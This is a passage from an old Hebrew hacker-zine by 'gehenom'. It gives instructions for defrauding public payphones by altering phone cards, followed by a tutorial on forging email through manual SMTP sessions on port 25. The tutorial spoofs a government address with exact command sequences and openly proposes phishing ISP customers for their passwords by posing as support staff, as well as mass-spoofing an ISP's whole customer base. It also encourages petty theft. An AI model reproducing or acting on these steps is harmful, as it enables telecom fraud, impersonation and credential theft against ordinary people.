‫חשוב מאוד שהקלטת תהיה ריקה‪ ,‬בלי שום דבר מוקלט עליה‪ .‬ושיהיה חדש‪ .‬מחיקת הקלטה ישנה לא‬
‫תעזור לנו‪.‬‬
‫כעת קחו מספריים וגזרו בעדינות חלק מן הסליל שבפנים‪ .‬זהרו על הסליל השחור שלא יתלכלך‪.‬‬
‫הדביקו‬
‫את הסליל על החלק האחורי העליון של הטלכרט‪ ,‬איפה שיש הרבה בליטות קטנות‪ .‬לאחר מכן‪ ,‬עברו‬
‫עם עיפרון‬
‫על הסליל‪ ,‬כך שיישאר שכבה דקה של פחם‪ .‬באסה שאת העפרונות עם הפחם הישנים החליפו כיום‬
‫עם חומר אחר‪.‬‬
‫לכן תיאלצו ללכת לחנות גרפיקה או לבית הישן של סבתא שלכם כדי למצוא עיפרון פחם‪ .‬אחרי‬
‫שגמרתם להדביק‬
‫את הסליל השחור המגנטי מהקלטת על הטלכרט‪ ,‬והשארתם עליו שיכבה דקה של פחם מן העיפרון‪,‬‬
‫הכניסו אותו‬
‫לתוך טלפון ציבורי‪ .‬מה שייקרה פה זה פעולה מגנטית הפוכה אשר הגלאי המגנטי לא יוכל לעמוד בו‪,‬‬
‫ולכן יהיה לכם זמן חופשי ללא הגבלה על הטלפון‪ .‬אז דברו חופשי‪ ,‬כי זה בזק‪.‬‬
‫‪gehenom‬‬
‫שימוש חוזר בכרטיסי טלכרט ‪ -‬שיטה מס‪2 .‬‬
‫שיטה שנייה למחזור טלכרטים‪...‬‬

‫דבר ראשון‪ ,‬עליכם למצוא כמה טלכרטים מ ש ו מ ש י ם‪ .‬כן‪ ,‬משומשים‪.‬‬
‫בשביל זה לכו לאוסף טלכרטים של אח שלכם הקטן ותגנבו לו חאפלה של איזה ‪.20‬‬
‫עדיף טלכרטים ישנים‪ ,‬למה הרבה מהחדשים מוגנים מפני הטריק שאני אראה לכם פה‪.‬‬
‫כמו כן עדיף שיהיה לכם איזה ‪ 20‬כי בניסיונות הראשונים זה בד"כ לא יוצא משהו ומה שקורה‬
‫זה שהטלכרט נהרס‪ ...‬לכן תדאגו שיהיה לכם כמות מכובדת‪ .‬אוקי‪ ,‬עכשיו תכייסו מהמכולת טיפקס‪.‬‬
‫התבוננו בחלק האחורי של אחד הטלכרטים‪ .‬רואים נקודות קטנות בולטות למעלה?‬
‫כסו אותם בשכבה שווה דקה של טיפקס‪ .‬עשו זאת בעדינות‪ .‬כל פעם שהטלכרט ייגמר‪,‬‬
‫תיאלצו לעשות זאת מחדש‪ ,‬אבל לא נורא‪ .‬תיהנו!!!!!!!!!!!‬
‫ודברו חופשי‪ ,‬כי זה בזק‪.‬‬
‫‪gehenom‬‬
‫זיוף ‪ - email‬חלק ‪1‬‬
‫בכתבה הזאת‪ ,‬הכתבה הכי טובה עד עכשיו אם תשאלו אותי‪,‬‬

‫אני אראה לכם איך לזייף אי מייל‪ .‬מה זאת אומרת? הכוונה היא שתוכלו לדוגמא‬
‫לשלוח לחבר שלכם אי מייל והחבר שלכם יחשוב שהוא קיבל את האי מייל הזה מדורון שפר‪.‬‬
‫כמובן שמצחוקים אפשר לעבור לצחוקים יותר טובים‪ ,‬כמו לשלוח למורה אי מייל מהמנהל‪,‬‬
‫או שאפשר גם לעבור לדברים רציניים יותר‪ ,‬כמו למשל לשלוח ללקוח של ספק אינטרנט כגון‬
‫נטויז'ין לדוגמא‪ ,‬אי מייל מהצוות תמיכה של נטויז'ין ולבקש ממנו את השם משתמש והסיסמא‪.‬‬
‫כמובן שזה ייראה לו חשוד‪ ,‬ולכן מה שאנחנו‪ ,‬ההאקרים‪ ,‬עושים במקרים כאלה‪,‬‬
‫זה משתמשים בקצת פסיכולוגיה‪ .‬אבל לפני שאני אתן לכך דוגמאות כדאי שנעבור כבר‬
‫לזיוף האי מייל הראשון שלכם!!!‬
‫החלטתי שלפני שאני אסביר משהו‪ ,‬הפעם נתחיל מייד עם האקשן (‪)yeah, right...‬‬
‫רק אח"כ אני אסביר מה עשינו‪ ,‬ונתחיל לשחק עם זה‪)play with it???( ...‬‬
‫רק דבר אחד לפני שאנחנו מתחילים‪ ,‬את האקשן הראשוני נעשה עם ‪.hotmail‬‬
‫למה עם ‪ ?hotmail‬מכמה סיבות‪:‬‬
‫* מליוני אנשים רשומים אליהם‪.‬‬

‫אתם תוכלו לזייף אי מייל עם ביטחון וניסיון להמוני אנשים‪.‬‬
‫* מסיבות כאלה ואחרות אני רוצה שגם אתם תשנאו את מיקרסופוט ותצטרפו למועדון השונאים‬
‫והשונאות‪.‬‬
‫אם אני אראה לכם כמה קל זה לשלוח אי מיילים מזויפים ללקוחות שלהם‪ ,‬סביר להניח שלא תאהבו‬
‫אותם על כך‪.‬‬
‫בעיקר בגלל שסביר להניח שכרגע אתם לקוחות שלהם‪.‬‬
‫* ככה סוף סוף תעזבו אותם‪ .‬תזרקו אותם‪ .‬ותשיגו כתובת אי מייל נורמלית‪.‬‬
‫לא עוד ‪ you@hotmail.com‬מגעיל‪ ....‬אלא מעכשיו ‪ you@any-thing-else-ya-want.com‬יפהפה‪.‬‬
‫בכדי שנוכל להתחיל‪ ,‬אם אתם עוד לא רשומים‬

‫ל ‪ hotmail.com‬אז לכו ל ‪ http://www.hotmail.com‬ותירשמו‪.‬‬
‫‪................................................‬‬
‫הערה‪:‬‬
‫‪ hotmail.co.il‬ו ‪ hotmail.com‬זה לא אותו דבר‪.‬‬
‫גם המנויים של ‪ hotmail.co.il‬צריכים ללכת לאתר‬
‫של ‪ hotmail.com‬ולהירשם‪ .‬אם לא תעשו את זה‪,‬‬
‫אז כלום פה לא יעבוד‪...‬‬
‫רק מי שרשום ל ‪ hotmail.com‬לא חייב להירשם שנית‬
‫אלא ישתמש בכתובת שקיבל מ ‪hotmail.com‬‬
‫תודה‬
‫‪................................................‬‬
‫טוב‪ ,‬נתחיל‪ .‬נגיד לדוגמא שהאי מייל שלכם ב ‪ hotmail.com‬הוא ‪hacker@hotmail.com‬‬
‫אנחנו עכשיו נשלח לכם אי מייל מראש הממשלה‪ .‬כתובת האי מייל של ראש הממשלה היא‪:‬‬
‫‪rohm@pmo.gov.il‬‬
‫(דרך אגב‪ ,‬זאת באמת כתובת האי מייל של הראש הממשלה‪ .‬נשבע לכם‪ .‬אל תאמינו‪ ..‬לא צריך‪).‬‬
‫אוקי‪ ,‬תעשו את הצעדים הבאים‪:‬‬
‫* לחצו על תפריט ההתחל‬

‫* בחרו בהפעלה‪...‬‬
‫* עכשיו הקלידו‪telnet mail.hotmail.com 25 :‬‬
‫ולחיצו על כפתור ה ‪.enter‬‬
‫חלון חדש ייפתח‪ .‬זה חלון טלנט‪ .‬מה שאנחנו בעצם עושים פה זה מטלנטים (מתחברים‪ )..‬לשרת דואר‬
‫של‬
‫‪ hotmail‬לפורט ‪ .25‬מבולבלים?‬
‫תסגרו את חלון הטלנט ואני אסביר לכם‪....‬‬
‫האינטרנט הוא בעצם רשת ענקית של רשתות מחשבים מחוברות אחת לשנייה‪.‬‬
‫ביחד זה בלגן אחד גדול של תעבורת אינפורמציה בין מיליוני מחשבים‪ .‬מחשבים ביתיים‪ ,‬שרתים‪,‬‬
‫תחנות עבודה‪ ,main frames ,‬מפלצות‪ ,‬חתולים‪ ,‬מה שאתם לא רוצים‪.‬‬
‫עכשיו‪ ,‬לא לכל המחשבים האלה יש ‪ .windows‬בעצם‪ ,‬לרובם אין‪ .‬לרוב השרתים לפחות‪...‬‬
‫בכל מקרה‪ ,‬מכיוון שלא לכל המחשבים יש מערכת הפעלה אחת סטנדרטית‪ ,‬צריך כלי תקשור‬
‫סטנדרטי‪.‬‬
‫צריך חוקים מסוימים‪ ,‬שכל מחשב ילך לפיהם כדי לתקשר עם מחשבים אחרים‪ .‬צריך שפה משותפת‬
‫בין המחשבים‪.‬‬
‫צריך‪ ....‬פרוטוקולים‪ ....‬יפה‪ .‬עכשיו לא נתחיל לדבר פה על כל הפרוטוקולי אינטרנט כי יש הרבה‪,‬‬
‫אבל תבינו שהדפדפן אינטרנט המחורבן שלכם זה לא אינטרנט‪ .‬זה דפדפן‪ .‬הוא מתחבר לשרת ‪.http‬‬
‫ולפי חוקי פרוטוקול ה ‪ http‬הוא מתקשר עם השרת‪ ,‬מקבל את המידע על האתר‪( ,‬בשפת ‪)html‬‬
‫ומתרגם את זה‬
‫למה שאתם רואים בדפדפן‪.‬‬
‫דרך אגב‪,‬‬
‫‪http = hyper text transfer protocol‬‬
‫כלומר פרוטוקול של העברת היפר טקסט‪ .‬או במילים אחרות טקסט שאתם לוחצים עליו וכך עוברים‬
‫לטקסט אחר‪.‬‬
‫מה שנקרא בשפה המודרנית ‪ -‬לגלוש‪ .‬ובשפה הדו מודריונרית ‪ -‬סתאאאאאם‪ .‬לא חשוב‪.‬‬
‫עכשיו‪ ,‬אי מייל לעומת זאת משתמש בשני פרוטוקולים‪ smtp :‬ו ‪.pop3‬‬
‫אנחנו עכשיו נשתמש רק ב ‪ .smtp‬למי שמעוניין‪,‬‬
‫‪smtp = simple mail transfer protocol‬‬
‫ובקציצוצוציצור עכשיו‪ ,‬מה שנעשה זה‪ ,‬בדיוק כמו שהדפדפן אינטרנט שלכם מתחבר לשרת ‪http‬‬
‫לפורט ‪,80‬‬
‫אנחנו נתחבר לשרת ‪ smtp‬לפורט ‪ .25‬למה? ככה‪ .‬אני לא אסביר את זה בכתבה הזאת כי אין מקום‪...‬‬
‫ואז‪ ,‬כמו שלדוגמא ניקח את ה ‪ ms outlook‬שלכם‪ ,‬כמו שהאאוטלוק (או כל תוכנת דואר אחרת)‬
‫מתקשרת עם‬
‫שרת הדואר (‪ ,)smtp‬ככה הפעם אנחנו נעשה י ד נ י ת‪ .‬נעשה חיבור חי‪ .‬ונדבר עם השרת‪ .‬דמיינו‬
‫שעכשיו‬
‫אתם תוכנת אאוטלוק‪ .‬או כל תוכנת דואר אחרת שאתם רוצים‪ .‬עכשיו דמיינו שאתם אפרוח‪.‬‬
‫עכשיו דמיינו שאתם במדינה שבה סמים הם דבר חוקי‪ .‬דמיינו שאתם‪..‬‬
‫‪ ###‬עכשיו תתעוררו ותחזור למציאות המרושעת‪### .‬‬
‫נמשיך‪.‬‬
‫לוחצים על התחל‪ ,‬הפעלה‪ ,‬ומקלידים ‪.telnet‬‬
‫זה ייפתח את תוכנת הטלנט‪ ,‬שנותנת לנו להתחבר לאיזה שרת שאנחנו רוצים לאיזה פורט שאנחנו‬
‫רוצים‪.‬‬
‫מה זה פורט (יציאה)? ובכן‪ ,‬הכוונה הטכנית היא למשהו שפתוח במחשב ומוכן לחיבור‪ .‬כלומר מחכה‬
‫לחיבור‬
‫ממחשב אחר (או מכל דבר אחר בעצם)‪ .‬אבל בדרך כלל כשמדברים על פורט מתכוונים למספר של‬
‫הפורט‪.‬‬
‫לדוגמא פורט ‪.80‬‬
‫פורט ‪ 80‬למי שלא יודע זה השרת אינטרנט‪.http ,‬‬
‫כמובן שזה לא תמיד חייב להיות דווקא ככה‪ ,‬בעיקרון כשפותחים שרת אפשר לקבוע דרך איזה‬
‫פורט יהיה אפשר לגשת אליו‪ .‬אבל בד"כ פורט ‪ 80‬זה אתר אינטרנט‪ .‬פורט ‪ 110‬זה דואר נכנס‪.‬‬
‫פורט ‪ 25‬זה דואר יוצא‪ ,‬ולכן אנחנו נתחבר לפורט ‪ .25‬אבל שוב‪ ,‬זה לאו דווקא תמיד ככה‪.‬‬
‫למי שרוצה לדעת למה דווקא פורט ‪ 80‬זה לשרת אינטרנט ולמה דווקא פורט ‪ 25‬לדואר יוצא‪,‬‬
‫אז ככה‪ :‬לכל פרוטוקול אינטרנט יש ‪ ,rfc‬שמגדיר אותו‪ .‬זה לא אומר שכל ‪ rfc‬מגדיר פרוטוקול‬
‫אינטרנט‪.‬‬
‫יש גם ‪ rfc‬על אבטחה‪ ,‬או על תוכנה חדישה בפיתוח‪ ,‬או סתאם הערות על פיתוח טכנולוגיית אינטרנט‬
‫כזו או אחרת‪ .‬יש ‪ rfc‬מצחיק‪ ,‬יש ‪ rfc‬דפוק‪ ,‬יש כל מיני‪.‬‬
‫‪rfc = request for comments‬‬
‫עכשיו‪ ,‬שם קובעים את הסטנדרטים לכל פרוטוקול‪ .‬ככה כל חברה או תכנתן יחיד יכול לתכנת את‬
‫תוכנת השרת‬
‫או את תוכנת הלקוח שלו לפי אותם החוקים שכל חברה‪/‬תכנתן אחר בעולם ייעשה ולא משנה לאיזה‬
‫מערכת הפעלה‬
‫זה מתוכנת זה יוכל לתקשר עם השרת‪/‬לקוח של האחר‪.‬‬
‫(שרת‪/‬לקוח‪ :‬תוכנת לקוח = אינטרנט אקספלורר לדוגמא | תוכנת שרת = ‪ httpd‬לדוגמא ] למי שמכיר‬
‫])‬
‫לכן אאוטלוק יכול להתחבר לשרתי דואר על מקינטוש‪ ,‬יוניקס‪ ,‬ווינדוס‪ ,‬נובל וכל מערכת אחרת‬
‫בעצם‪.‬‬
‫לכן שרת הדואר של מיקרוסופט יכול לקבל אימייל מכל תוכנת דואר שבעולם‪.‬‬
‫עכשיו נחזור לזיוף האימייל שלנו‪ .‬הרי הבטחתי לכם מייד אקשן‪.‬‬
‫טוב‪ ,‬תחזרו לחלון הטלנט‪ ,‬ומי שאצלו זה עדיין לא פתוח שייפתח‪ .‬שוב‪ ,‬כדי להיכנס לתוכנת הטלנט‬
‫תלחצו על התחל‪ ,‬הפעלה‪ ,‬והקלידו ‪.telnet‬‬
‫עכשיו‪ ,‬לחצו על תפריט ‪terminal‬‬
‫בחרו ב ‪preferences...‬‬
‫ובדקו ש'‪ 'local echo‬מסומן‪ .‬אם הוא לא מסומן‪ ,‬סמנו אותו עכשיו‪ ,‬ואז לחצו על ‪.ok‬‬
‫מה שה ‪ local echo‬עושה זה שהטקסט שתקלידו לשרת יוצג על המסך שלכם‪ .‬זה חשוב מאוד‪.‬‬
‫עכשיו לחצו על תפריט ‪ connect‬ובחרו ב ‪remote system...‬‬
‫כאן ייפתח לכם תיבה שמבקשת פרטים על השרת שברצונכם להתחבר אליו‪.‬‬
‫‪ :host name‬הקלידו כאן את כתובת השרת‪ .‬במקרה שלנו ‪mail.hotmail.com‬‬

‫‪ :port‬כאן מקלידים את הפורט‪ .‬אפשר גם לבחור מהרשימה‪ ,‬אבל היא מצומצמת‪ .‬הקלידו ‪25‬‬
‫‪ :termtype‬באיזה הדמיה לבחור‪ .‬אתם כרגע לא צריכים לדעת מה זה אומר‪ ,‬פשוט בחרו ‪vt100‬‬
‫כעת‪ ,‬לחצו על ‪.connect‬‬

‫כמו שאתם רואים זה מתחבר לשרת דואר‪.‬‬
‫השרת מציג לנו איזה גרסה הוא‪ ,‬לפעמים את החברה שתכנתה אותו‪ ,‬את השעה‪ ,‬תאריך‪ ,‬או לפעמים‬
‫כלום‪.‬‬
‫זה הכל תלוי בשרת‪ .‬במקרה שלנו זה מציג‪:‬‬
‫‪hotmail )no uce( esmtp server ready at mon feb 12 10:59:39 2000-220‬‬
‫‪esmtp spoken here 220‬‬
‫פחות או יותר‪...‬‬
‫עכשיו‪ ,‬אם השרת לא מקבל ממכם קלט לזמן מסוים (בד"כ כ ‪ 10-30‬שניות)‪ ,‬הוא מנתק את החיבור‪.‬‬
‫לכן כנראה תיאלצו להתחבר מחדש לפי ההוראות שנתתי מקודם‪ .‬טוב‪ ,‬אחרי שזה הציג לכם את הזבל‬
‫שלו‪,‬‬
‫הקלידו את השורות הבאות‪:‬‬
‫‪helo hacker‬‬
‫‪mail from: rohm@pmo.gov.il‬‬
‫‪rcpt to: hacker@hotmail.com‬‬
‫‪data‬‬
‫‪from: il goverment‬‬
‫‪subject: israel's goverment is proud of you‬‬
‫‪date: feb 12 2001‬‬
‫‪hi hacker‬‬
‫‪the israeli goverment is very proud of you‬‬
‫‪you now have the knowledge to forge email, which is real cool‬‬
‫‪and usefull too. please use it correctly and carefully‬‬
‫‪il govermnet‬‬
‫‪.‬‬
‫זהו‪ .‬רק במקום ‪ hacker@hotmail.com‬תכתבו את האימייל שלכם‪.‬‬

‫עוד הערה זה שלחיצה על ה ‪ backspace‬כדי למחוק תווים לא תעבוד‪ .‬כלומר‪ ,‬זה ייראה כאילו זה‬
‫מוחק אותם‪,‬‬
‫אבל מה שזה בעצם עושה זה מוסיף את זה כמו אות‪ .‬אני לא אסביר עכשיו למה אני מתכוון‪ ,‬רק‬
‫תיזהרו‬
‫לא לטעות בהקלדה‪ ,‬כי לא תוכלו להיעזר ב ‪ .backspace‬אם אתם טועים‪ ,‬פשוט לחצו על מקש ה‬
‫‪ enter‬ואז‬
‫הקלידו שוב את מה שרציתם להקליד אבל טעיתם‪ .‬עכשיו כנסו ל ‪ www.hotmail.com‬ותבדקו את‬
‫האימייל שלכם‪.‬‬
‫יהיה שם מכתב מראש הממשלה‪ .‬מגניב או לא מגניב???? (!!!!!!!!!!!!!!!!!‪)magniv‬‬
‫קראו את המכתב‪ ,‬ואז לחצו על ‪ reply‬כדי לשלוח לו מכתב בחזרה‪ .‬כמו שתראו‪,‬‬
‫זה יישלח את המכתב חזרה לאימייל האמיתי שלו‪ .‬כלומר למי שאתם שולחים אימייל מזויף‪ ,‬אין‬
‫סיכוי לדעת‬
‫שזה מזויף‪ .‬אלא אם כן הוא קרא את הכתבה הזאת‪ .‬בהמשך‪ ,‬בחלק ‪ 3‬של המדריך הזה‪,‬‬
‫אני אסביר לכם איך לבדוק אם האימייל שקיבלתם מזויף‪.‬‬
‫אבל לפני שאתם קופצים לחלק ‪ ,3‬יש לכם את חלק ‪,2‬‬
‫שמסביר טכנית איך הכל עובד ונותן לכם לשחק עם זה כמה שאתם רוצים‪ .‬עד לפעם הבאה‪,‬‬
‫‪gehenom‬‬
‫"יונתן הקטן הלך בבוקר אל הגן‪.‬‬

‫הוא טיפס על העץ אפרוחים חיפש‪.‬‬
‫אוי ואבוי לו לשובב‪ .‬חור גדול‬
‫במכנסיו‪ .‬מן העץ התגלגל‪,‬‬
‫ועונשו קיבל‪"...‬‬
‫ברוווווווווווווכים הבאים לחלק השני של המדריך 'זיוף אי מייל'!!!‬

‫בחלק זה‪ ,‬אני אסביר לכם למה ככה זה ככה ואיך עושים את זה ואת זה‪.‬‬
‫אחרי שתגמרו עם החלק הזה‪ ,‬לא רק שתהיו מוכנים לעבור לחלק השלישי והאחרון‪,‬‬
‫אלא גם תוכלו לזייף אימייל לכל שרת דואר שקיים‪ ,‬תוכלו לעשות זאת בעברית‪ ,‬ולהשתמש בזה נכון‪,‬‬
‫ולהבין איך הכל עובד ולמה‪ .‬תוכלו לשלוח לכמה אנשים באותו הזמן‪ .‬והכי חשוב ‪ -‬מוטי יחזור כבר‬
‫הביתה‪.‬‬
‫מי זה מוטי? וואלה לא יודע‪ ....‬טוב‪ ,‬נתחיל‪.‬‬
‫}}}‬
‫רוב החומר שתקראו פה נלקח מ '‪ 'rfc 821‬שמגדיר את פרוטוקול ה ‪.smtp‬‬

‫החומר תורגם לעברית בכדי שתוכלו להבין אותו‪ .‬למרות זאת‪ ,‬אני לא מבטיח‬
‫לכם שום דבר‪ ,‬והתרגום פה נעשה בדרך האישית שלי‪ ,‬והוא בהחלט לא תירגם‬
‫רשמי של ה ‪ .rfc‬אני מאוד ממליץ לכל אלה מכם שיודעים אנגלית לקרוא את ‪.rfc 821‬‬
‫{{{{‬
‫טוב‪ ,‬אז אם כי זה לא נמצא בכל שרת‪ ,‬רוב שרתי הדואר מבקשים שאתם‪,‬‬
‫אלה ששולחים את האימייל‪ ,‬תזדהו‪ .‬זאת כדי שיידעו מי אתם‪ .‬בד"כ כשאתם שולחים‪/‬מקבלים‬
‫אימייל‬
‫הוא עובר דרך יותר משרת אחד‪ .‬כאשר לכל שרת שהוא נשלח השרת שממנו הוא הגיע מזדהה‪ ,‬וכך מי‬
‫שמקבל את‬
‫האימייל יודע דרך איפה זה עבר‪ .‬זה יכול להיות מאוד יעיל במקרים מסוימים‪ .‬כמובן שזאת לא‬
‫הסיבה‬
‫העיקרית‪ ,‬זאת סתאם הייתה דוגמא שאתם כנראה תשתמשו בה בעתיד‪ .‬בכל מקרה‪ ,‬פקודת‬
‫ההזדהות היא‪:‬‬
‫‪helo‬‬
‫עכשיו‪ ,‬לא כל השרתים מתייחסים לפקודה באותה צורה‪ .‬יש הרבה שרתים שבכלל לא משתמשים‬
‫בפקודה הזאת‪,‬‬
‫ואם תשלחו להם את הפקודה הם לא יידהו אותה‪ .‬בשרתים אחרים לעומת זאת‪ ,‬הפקודה היא חובה‪,‬‬
‫ובלעדיה‪,‬‬
‫לא תוכלו לשלוח את האימייל‪ .‬אצל רוב השרתים‪ ,‬אתם לא חייבים להגיד ‪ ,helo‬למרות שכנראה‬
‫השרת יעיר‬
‫לכם על כך אבל הוא בכל זאת ייתן לכם לשלוח דרכו את האימייל‪ .‬ככה שתעשו מה שאתם רוצים‪ .‬אני‬
‫רק אבהיר‬
‫פה משהו חשוב‪ :‬הפקודה ‪ helo‬היא לא זאת שגורמת להזדהות‪ .‬כלומר‪ ,‬אם לא תכתבו ‪ helo‬זה לא‬
‫אומר שאתם‬
‫אנונימיים והשרת לא יודע מי אתם‪ .‬הפקודה רק מסמלת את ההזדהות והרבה פעמים ככה השרת גם‬
‫יודע דרך איזה‬
‫תוכנה שלחו את האימייל או מאיזה דומיין‪ .‬בכל מקרה‪ ,‬אני ממליץ שתשחקו עם זה בדיוק כמו עם כל‬
‫פקודה‬
‫שאני אתן פה‪ .‬אצל ‪ mail.hotmail.com‬לדוגמא‪ ,‬לא רק שתיאלצו לכתוב את הפקודה‪,‬‬
‫אלא גם תצטרכו להגיד מי אתם‪.‬‬
‫דוגמאות‪:‬‬
‫‪helo eduction.gov.il‬‬
‫‪helo walla.co.il‬‬
‫‪helo hacker‬‬
‫‪helo fuckyou‬‬
‫‪helo ido‬‬
‫טוב‪ .‬רק הערה אחרונה בקשר ל ‪ ,helo‬אם אתם תוהים למה זאת פקודת הזדהות אם בד"כ כותבים‬
‫רק ‪ helo‬בלי‬
‫להזדהות‪ ,‬אז ככה‪ ,‬ברגע שאתם כותבים‪:‬‬
‫‪helo‬‬
‫השרת מגיב ב ‪ lookup‬שבודק את כתובת המחשב שלכם‪ .‬אבל שוב‪ ,‬זה לא אומר שאם לא תכתבו‬
‫‪ helo‬שרת הדואר‬
‫לא יידע מי אתם‪....‬‬
‫טוב‪ ,‬אז אחרי ה ‪ helo‬באה הפקודה הבאה‪.mail :‬‬
‫הפקודה ‪ mail‬אומרת לשרת שיתחיל עכשיו שליחת אימייל חדש‪ ,‬ויימחק (כמעט) את כל המידע שהיה‬
‫לו עד עכשיו‬
‫על המכתב שעבר‪ ,‬כולל מי יקבל את המכתב‪ ,‬את תוכן המכתב עצמו‪ ,‬את השולח וכו'‪ .‬מקלידים את‬
‫הפקודה‬
‫בצורה הבאה‪:‬‬
‫‪mail from: sender‬‬
‫כאשר ה ‪ = sender‬כתובת דואר שממנה מי שמקבל את האימייל יקבל את האימייל‪.‬‬

‫לדוגמא‪:‬‬
‫‪mail from: yosi@hotmail.com‬‬

‫‪mail from: shaq@lakers.com‬‬
‫‪mail from: omri@netvision.net.il‬‬
‫את הפקודה ‪ mail‬השרת מקבל רק פעם אחת‪ .‬ברגע שהשרת קיבל את הפקודה‪ ,‬הוא יגיב עם הערה‬
‫חיובית‬
‫שבאה יחד עם המספר ‪ .250‬כמעט ואף פעם לא יקרה לכם שהשרת לא יחזיר תגובה של ‪ 250‬אחרי‬
‫פקודת ה ‪.mail‬‬
‫זאת מכיוון שהשרת במקרה זה‪ ,‬מקשיב למה שאומרים לו‪ .‬ואם תגידו לו שאתם‬
‫‪ yosi@sdf.sdf.bye.fuck‬הוא‬
‫יקבל זאת‪ .‬כמובן שזה לא נכון לכל שרתי הדואר‪ ,‬אבל אצל רובם זה כך‪ .‬באמת‪ .‬נסו את זה בעצמכם‪.‬‬
‫מקסימום הוא יגיד לכם שהדומיין ‪ sdf.sdf.bye.fuck‬לא קיים‪ .‬אבל זה ייקרה לעיתים מאוד‬
‫רחוקות‪..‬‬
‫במקרה וכתבתם‬
‫‪mail from: tosi@hotmail.com‬‬
‫במקום‬
‫‪mail from: yosi@hotmail.com‬‬
‫פשוט הקלידו מחדש את מה שרציתם‪,‬‬
‫ומכיוון שאחרי פקודת ה ‪ mail‬השרת מוחק את המידע שהיה לו על המכתב‪ ,‬הכתובת החדשה‬
‫והנכונה תתקבל‪ ,‬ולא זאת השגויה‪ .‬רק הערה קטנה‪ ,‬הפקודה ‪ mail‬לא נועדה בכדי למחוק את המידע‪,‬‬
‫בשביל זה יש פקודה נוספת‪ ...‬אבל תרגישו חופשיים להשתמש בזה בהתחלה כדי לתקן את ה ‪.mail‬‬
‫עכשיו‪ ,‬אחרי ה ‪ mail‬מגיע ה ‪ .rpct‬ה ‪ rcpt‬אומר לשרת מי יהיה זה שיקבל את האימייל‪.‬‬

‫אם השרת מוצא שהכתובת אכן קיימת‪ ,‬הוא מגיב עם הערה חיובית שבאה יחד עם המספר‪ .250 ...‬אם‬
‫הוא לא‬
‫מצליח למצוא את הכתובת‪ ,‬הוא מגיב בהערה שלילית יחד עם המספר ‪ .550‬למי שעוד לא שם לב‪,‬‬
‫המספר ‪ 250‬מסמל את התקבלות הפקודה‪ .‬יש עוד מספרים שמסמלים עוד דברים‪ .‬אבל נמשיך עם ה‬
‫‪.rcpt‬‬
‫את ה ‪ rcpt‬כותבים כך‪:‬‬
‫‪rcpt to: receiver‬‬
‫כאשר ה ‪ = receiver‬כתובת הדואר של הנמען‪ .‬כלומר הבנאדם שיקבל את האימייל‪.‬‬

‫‪rcpt to: daniel@inter.net.il‬‬

‫‪rcpt to: dana19@hotmail.com‬‬
‫‪rcpt to: webmaster@yahoo.com‬‬
‫‪rcpt to: moron@education.gov.il‬‬
‫עכשיו‪ ,‬את הפקודה ‪ rcpt‬אפשר לכתוב ללא הגבלה כמה פעמים שאתם רוצים‪.‬‬
‫וכל זה במכתב יחיד!! לדוגמא הייתם רוצים לשלוח אימייל מזויף‬
‫לכל הלקוחות של בזק בינלאומי בפעם אחת‪ ,‬אתם מתחברים לשרת דואר שלהם ומקלידים משהו‬
‫כזה‪:‬‬
‫‪helo‬‬
‫‪mail from: support@bezeqint.net‬‬
‫‪rcpt to: user1‬‬
‫וכן הלאה‪ ...‬כמובן ש ‪ user1‬עד ‪ user6‬הם סתאם שמות שהמצאתי והם לאו דווקא אמיתיים‪...‬‬
‫אז כמו שאתם רואים אפשר להקליד את הפקודה ‪ rcpt‬אלפי פעמים בכל אימייל‪ .‬עם הפקודה ‪mail‬‬
‫לעומת זאת‪,‬‬
‫אי אפשר לעשות את זה‪ .‬אלא תיאלצו לכתוב את כל האימייל מחדש בשביל זה‪ .‬ועכשיו לפקודה‬
‫הבאה שלנו‪,‬‬
‫שהיא ה ‪ .data‬פקודת ה ‪ data‬מתחילה את המכתב עצמו‪ .‬כלומר בפקודה זו‪ ,‬אנו כותבים את המכתב‪.‬‬
‫אחרי שגמרנו‪ ,‬איך אומרים לשרת שגמרנו לכתוב את המכתב? פשוט מקלידים נקודה בשורה נפרדת‪.‬‬
‫‪data‬‬
‫‪hi danny, what's up? i heard you just got‬‬
‫‪the latest album of 2pac. what shall i say? it sucks‬‬
‫‪i've heard it like a thousand times‬‬
‫‪anyway, enjoy it‬‬
‫‪bye‬‬
‫‪.‬‬
‫ה ‪( .‬נקודה) בסוף מאוד חשובה‪ .‬זה גם הכרחי שהיא תהיה בשורה נפרדת‪.‬‬
‫את המכתב אפשר כמובן גם לכתוב בעברית‪ .‬עוד משהו חשוב‪ ,‬זה שהפקודה ‪ data‬כוללת גם את‬
‫הראשים‪.‬‬
‫כלומר את התוספות של המכתב‪ .‬כגון הנושא (או הכותרת אם אתם רוצים)‪ ,‬את התאריך‪ ,‬כתובת‪/‬שם‬
‫השולח‬
‫ולפעמים גם עוד כמה דברים‪ .‬את הראשים (תוספות) כותבים כך‪:‬‬
‫‪date: the date goes here‬‬

‫‪from: the sender‬‬
‫‪to: the receiver‬‬
‫‪subject: subject goes here‬‬
‫‪data‬‬
‫‪date: 23 oct 00 11:29:33‬‬
‫‪from: matrix@walla.co.il‬‬
‫‪to: yanir_br@yahoo.com‬‬
‫‪subject: happy birthday‬‬
‫‪hi yanir‬‬
‫‪i wish you a happy birthday‬‬
‫‪hope you'll enjoy being 15‬‬
‫‪i bought you this real awesome thing‬‬
‫‪you must see it‬‬
‫‪email me back as quick as ya can to matrix@walla.co.il‬‬
‫‪c ya, matrix‬‬
‫‪.‬‬
‫כמו שאתם רואים‪ ,‬יש שורה ריקה המבדילה בין הראשים (תוספות) למכתב עצמו‪ .‬השורה הזאת היא‬
‫הכרחית‪.‬‬
‫עכשיו‪ ,‬את המידע של הראשים (שולח‪ ,‬נושא וכו') אפשר לכתוב גם בעברית‪.‬‬
‫כמו כן אם ב ‪ mail‬ציינתם את כתובת השולח‪ ,‬מה שבטוח עשיתם‪ ,‬אז בתוספת ‪ from‬אפשר לכתוב‬
‫שם או כינוי במקום כתובת אימייל‪ .‬זה גם מאוד מומלץ לעשות את זה‪ .‬עוד משהו‪,‬‬
‫זה שאת התוכן של ה ‪ data‬עצמו אפשר גם לכתוב בעברית‪ .‬עכשיו נסיים את זה עם כמה אימיילים‬
‫מזויפים‬
‫ששלחתי‪ .‬דרך אגב‪ ,‬הכל פה אמיתי‪ .‬עשיתי לוגים מיוחד בשביל הטקסט הזה‪ .‬זה הכל הוקלט חי‬
‫מתוכנת הטלנט‪.‬‬
‫בסוף הדוגמאות‪ ,‬אני אראה לכם איך אתם יכולים גם להקליט את הזיופים שלכם‪ ,‬וכך תוכלו לעשות‬
‫עם זה‬
